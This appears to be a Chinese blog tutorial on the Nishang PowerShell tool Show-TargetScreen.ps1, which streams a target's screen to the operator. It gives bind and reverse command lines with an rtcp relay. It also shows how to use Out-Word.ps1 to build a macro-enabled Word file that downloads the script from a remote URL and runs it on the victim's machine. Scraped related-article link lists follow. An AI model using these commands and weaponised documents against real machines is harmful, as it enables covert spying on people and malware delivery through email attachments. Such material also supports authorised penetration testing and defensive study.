Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的，具有实战价值。包括了下载和执行、键盘记录、dns、延时命令等脚本。今天要给大家介绍的是如何通过powershell对目标的屏幕进行实时监控。

脚本下载地址如下:

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Show-TargetScreen.ps1

使用也很简单，脚本包括了reverse以及bind模式。下面是使用示例：

0x01 Bind模式：

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333

然后在自己的计算机上使用火狐访问目标3333端口，结果如下图：

0x02Reverse模式

attacker：

在这里可以使用创宇的py脚本转发：

https://github.com/knownsec/rtcp

执行:

rtcp [master] python rtcp.py l:5555 l:4444

监听本地5555端口以及4444端口。之后在target执行：

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Reverse-IPAddress 192.168.74.1 -Port 5555

效果截图：

0x03 使用Powershell Client

以Out-Word.ps1作为演示示例：

生成word文件:

PS C:\Users\evi1cg\Desktop> . .\Out-Word.ps1

PS C:\Users\evi1cg\Desktop> Out-Word -PayloadURL"http://192.168.74.1/Show-TargetScreen.ps1" -Arguments"Show-TargetScreen -Reverse -IPAddress 192.168.74.1 -Port 6666"

之后将Show-TargetScreen.ps1放在我们的web根目录，测试：

开启监听：

rtcp [master] python rtcp.py l:6666 l:4444

当运行开启office宏的word时，我们就可对其屏幕进行监控，如下图：

使用Powershell对目标进行屏幕监控相关推荐

1. 利用Http实现屏幕监控

   使用了idhttp实现了远程屏幕监控,可以网页使用也可以客户端使用. 文件:url80.ctfile.com/f/25127180-733994640-f168b8?p=551685 (访问密码: 5 ...

2. Node.JS实战34：远程屏幕监控？可以的

   是否想做一个远程系统屏幕监控功能?这是个有意思的功能. Node.JS可以实现,而且很方便. 目标效果: 在网页中实时查看系统屏幕内容. 实现原理: 1.用express实现服务器: 2.当访问来临时 ...

3. 用AutoHotkey写电脑屏幕监控软件

   今看到一个外包项目, 要求用VB写一个电脑屏幕监控软件, 具体要求如下: 电脑屏幕监控软件功能实现: 1.电脑非空闲(根据鼠标键盘动作判断?)时,每五秒(通过配置文件设置)截屏并按时间命名(如2010 ...

4. 恶意代码研究 -- 功能技术类 -- windows PE恶意代码（七）屏幕监控

   屏幕监控 大致过程 绘制桌面位图 绘制鼠标光标 保存位图图像 相关API GetDesktopWindow函数 GetDC函数 CreateCompatibleDC函数 GetSystemMetric ...

5. gh0st源码分析：屏幕监控

   这两天一直看gh0st源码,看得也是一头雾水,下面就分析一下屏幕监控的通信过程,对屏幕扫描算法以及绘图方面就不分析了,因为我也不懂.写的有点乱,就当作个笔记了. 首先从控制端按下屏幕监控选项开始,这时 ...

6. 屏幕监控中捕获鼠标位置信息

   server端: 在server.h中声明:void DispatchWMMessage(char *szString); server.c中添加  void DispatchWMMessage(ch ...

7. 如何在SYSTEM权限下实现屏幕监控

   屏幕监控是远控软件的基本功能之一. 版权声明 作者:iprowq 现在很多远控程序的服务端通常为DLL形式,通过远程线程注入等方法插入到services.svchost等SYSTEM权限的进程中去,而 ...

8. IP-guard屏幕监控，违规操作全记录

   审计终端操作,溯源泄密行为,我们需要详尽记录终端的各项行为,以便管理员能够及时发现风险以及异常操作,然而仅仅通过文字记录已经不能满足企业的审计需求,一些企业在进行严格的日志审计时,常常会结合屏幕记录一 ...

9. 实现屏幕监控的大体思路

   屏幕监控简单说就是对进程的当前桌面进行截屏存成位图,然后将此位图数据传输到远程. 对桌面进行截图需要通过一系列Windows GDI API来完成的. 首先通过CreateDC,CreateCompa ...

最新文章

1. c语言写输入汉字输出区位码程序,2017年计算机应用基础检测试题
2. C语言-程序运行效率总结及注意事项
3. [云炬创业基础笔记]第七章创业资源测试4
4. Python对QQ音乐进行爬取并进行数据分析
5. python输入print跳到documentation-习题 48: 更复杂的用户输入
6. 选择不相交区间(贪心算法) By ACReaper
7. 水滴石穿之页面遮罩层实现、向window.open()打开的窗口POST数据
8. “那不勒斯”服务器芯片,32核/64超线程：AMD 公开 Naples “那不勒斯” 部分规格和性能...
9. 【编译原理笔记14】中间代码生成：布尔表达式的回填，控制流语句的回填，switch语句的翻译，过程调用语句的翻译
10. 如何使用Highscore进行XRD物相分析？
11. 空间域图像增强（matlab实现）
12. 四叉树 Quadtrees
13. 0611 auto sorting and resend script
14. [ASP.NET] 结合Web API在OWIN下实现OAuth
15. 爬虫 【第一章】爬虫基本原理
16. 【嵌入式项目开源】基于ESP32的墨水屏桌面小屏幕
17. 谈一谈Java中的“静态”
18. 分享10个红色警戒2经典MOD
19. qu32调音台说明书_使用效果不错艾伦赫赛QU32调音台带中文说明书_北京金舒恺歌科技发展有限公司(亿商网手机版)...
20. ai人工智能相关职业_2020年及以后的5个人工智能最佳职业

热门文章

1. 钟翔平：坚持走手机浏览器架构创新之路
2. 启动nginx报错/usr/local/nginx/sbin/nginx: error while loading shared libraries: libpcre.so.1: cannot ope
3. Windows 7中禁用连按五次Shift键时出现粘滞键的方法
4. 基于SSM框架的图片分享及评价网站设计与实现毕业设计源码201524
5. 薅资本主义羊毛新姿势，英伟达K80免费用
6. win7和xp系统下的防火墙配置例外
7. UVA10118Free Candies
8. 计算机检索终端室与目录厅的区别,图书馆建筑设计规范 条文说明 建筑设计 目录检索、出纳空间...
9. 《阅读的方法》读书笔记2-2：遥远的地方
10. java 连接Linux服务器并执行指令